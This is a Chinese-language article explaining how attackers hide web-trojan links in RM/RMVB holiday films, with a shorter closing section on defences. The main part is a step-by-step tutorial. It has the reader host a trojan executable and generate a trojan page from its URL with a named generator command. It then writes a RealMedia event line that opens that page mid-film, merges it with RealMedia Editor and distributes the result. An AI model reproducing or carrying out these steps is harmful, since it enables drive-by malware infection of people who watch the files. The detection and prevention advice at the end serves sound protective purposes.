时至岁末,各种各样的贺岁片纷纷出炉,这也是黑客利用夹带网页木马的RM/RMVB电影文件捕捉肉鸡的好时节,许多人纷纷中招。那么黑客是怎么把网页木马加入RM/RMVB电影中的呢?
1.RM/RMVB唯一能夹带网页木马的格式
在所有电影格式里面,为什么就只有RM/RMVB就夹带网页木马呢?这与该格式的发布者Real公司有关。Real公司允许在RM/RMVB格式的文件里,插入用户设置的任意网页链接来进行广告宣传,当这些网页链接被打开时默认使用的是Real公司的浏览器。
可是没想到这种方法,没有给Real公司带来多少实际利益,却为黑客提供了一种方便的网页木马传播手段。只需要将网页木马的链接添加在RM/RMVB里面,当用户打开时就会中招。
小提示:其他电影格式就只能用捆绑木马的方式传播。
2.网马捆绑RM并不难
第一步:制作网页木马
首先准备好一个木马的服务端程序,将它上传到网络空间里面,得到一个服务端文件的链接。现在利用最新的MCAfee网页木马生成器来创建一个网页木马。先打开系统的命令提示符窗口,在窗口切换到生成器所在的目录,比如输入“cd d:”就可以进入D盘。
接着执行命令:McAfee [生成HTML文件名],我们按照程序的提示要求输入:McAfee http://www.mm.Com/mm.exe cs.Html(如图1),既可以在程序目录创建一个网页木马。现在将生成的网页木马上传到网页空间即可。
创建一个网页木马
第二步:制作时间文件
打开记事本程序,在其中输入下面的一段代码:u 00:10:00.0 00:11:00.0 http://www.mm.Com/cs.Html(如图2)。这段代码的意思是在影片的第10分钟到11分钟的时候,打开后面的“http://www.mm.Com/cs.Html”的这个网页链接,这个网页链接就是我们刚刚设置的网页木马的地址,然后将它保存为一个任意名称的文本文件。
用记事本输入代码
第三步:制作网马RM
准备一段RM或RMVB视频文件以及相关的视频编辑工具RealMedia Editor。接着启动编辑程序,点击“文件”菜单下的“打开Real媒体文件”命令,来打开准备好的那段RM/RMVB视频文件。
然后点击“工具”菜单下的“合并事件”命令,再选择刚才制作的那个文本文件。最后点击“文件”菜单下的“RealMedia文件另存为”命令,对这个合并的文件重新进行另存为操作即可(如图3)。现在将这个恶意的RM文件传播出去,当人们观看这个RM/RMVB文件后,就可能通过网页木马植入木马程序。
制作恶意的RM文件
3.防范方法
当RM或RMVB文件下载到本队以后,可以通过“超级兔子RM广告清除器”对文件进行扫描。运行“超级兔子RM广告清除器”,在“输入要去除广告的文件名”中选择RM文件,再在“输入新生成的文件名”设置除掉网页广告或木马后的RM文件,然后点击“开始清除”按钮就会进行扫描(如图4)。如果发现广告信息或木马信息,就会自动清除并弹出一个对话框提示用户。其实最简单方法就是下载完成后,断掉网络再进行文件的观看。
功能强大的超级兔子
对于那些嵌入到网页中的RM/RMVB文件,首先用户需要安装最新的系统,以及应用程序的补丁程序。这样网页木马就不能激活漏洞来下载安装木马程序,也可以通过IE卫士、金山清理专家、瑞星卡卡的网页木马拦截功能,对这些文件中可能存在的网页木马进行拦截。
总结
利用RM/RMVB文件进行网页木马传播,已经是一种非常古老的方法了,但是我们不得不承认它的确是非常有效的。在年终,黑客会制作带网页木马的RM/RMVB热门贺岁片,大肆传播,这阵现象将在最近持续一段时间,大家下载电影的时候多留心一下。